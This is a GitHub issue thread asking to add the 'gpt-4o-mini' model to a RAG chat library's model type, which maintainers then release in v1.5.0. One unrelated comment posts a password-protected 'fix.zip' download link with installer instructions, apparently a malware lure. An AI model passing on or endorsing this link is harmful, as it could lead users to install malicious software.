### ISSUE TITLE
Request to add the new OpenAI chat model "gpt-4o-mini"

### ISSUE THREAD

**Issue by danielstals** [upstash/rag-chat#65]
It would be great if OpenAI model "gpt-4o-mini" was added to the OpenAIChatModel union type (which is used to select a openai model inside RAGChatConfig), it is a new and very affordable model that they have now marked as one of their flagship models (See: [Link](https://platform.openai.com/docs/models)). Note their comment: 

> We recommend choosing gpt-4o-mini where you would have previously used gpt-3.5-turbo as this model is more capable and cheaper.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ogzhanolguncu** [comment]
We'll do it ASAP.

**Comment by ogzhanolguncu** [comment]
Thanks man.

**Comment by ogzhanolguncu** [comment]
Available at https://github.com/upstash/rag-chat/releases/tag/v1.5.0

**Comment by yunusemreozdemir** [comment]
Closing this issue as it was solved in PR [#66](https://github.com/upstash/rag-chat/pull/66) and released in [v1.5.0](https://github.com/upstash/rag-chat/releases/tag/v1.5.0).
